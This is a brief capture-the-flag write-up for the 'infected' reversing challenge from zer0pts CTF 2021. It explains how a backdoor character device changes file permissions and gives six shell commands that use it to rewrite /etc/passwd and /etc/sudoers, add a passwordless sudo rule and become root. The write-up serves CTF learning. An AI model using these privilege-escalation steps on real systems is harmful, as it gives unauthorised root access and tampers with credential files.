# infected - zer0pts CTF 2021 ###### tags: `zer0pts CTF 2021` `reversing` ## overview We were given a backdoor binary. At first glance we can see some CUSE functions. It is easy to analyze that creates character device `/dev/backdoor` and the device changes file permission according to input `b4ckd00r:<file path>:<permission>`  The remained is the shell things. We want to see contents of `/root` with arbitrary file read / write (because we can change arbitrary file's permission to 777). To see in the `/root`, we should become the root user. The easist way to be root is using `su`. So our purpose is to execute `su` or `sudo su`. ## solution We can solve this problem with the following commands: 1. `echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor` 2. `echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd` 3. `echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor` 4. `echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers` 5. `echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor` 6. `sudo /bin/su` Then done